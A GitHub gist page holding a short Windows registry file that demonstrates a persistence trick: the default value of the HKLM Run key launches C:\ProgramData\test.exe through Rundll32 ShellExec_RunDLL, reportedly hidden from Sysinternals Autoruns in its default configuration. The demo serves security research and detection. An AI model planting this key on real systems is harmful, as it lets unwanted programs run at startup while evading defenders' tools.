Skip to content

Instantly share code, notes, and snippets.

@TechByTom
Forked from hasherezade/test.reg
Created February 1, 2018 17:56
Show Gist options
  • Select an option

  • Save TechByTom/65fb6c8b5241ef90c11dcd029572f50b to your computer and use it in GitHub Desktop.

Select an option

Save TechByTom/65fb6c8b5241ef90c11dcd029572f50b to your computer and use it in GitHub Desktop.
Demo: persistence key not visible for sysinternals autoruns (in a default configuration - read more: https://twitter.com/hasherezade/status/849756054145699840)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment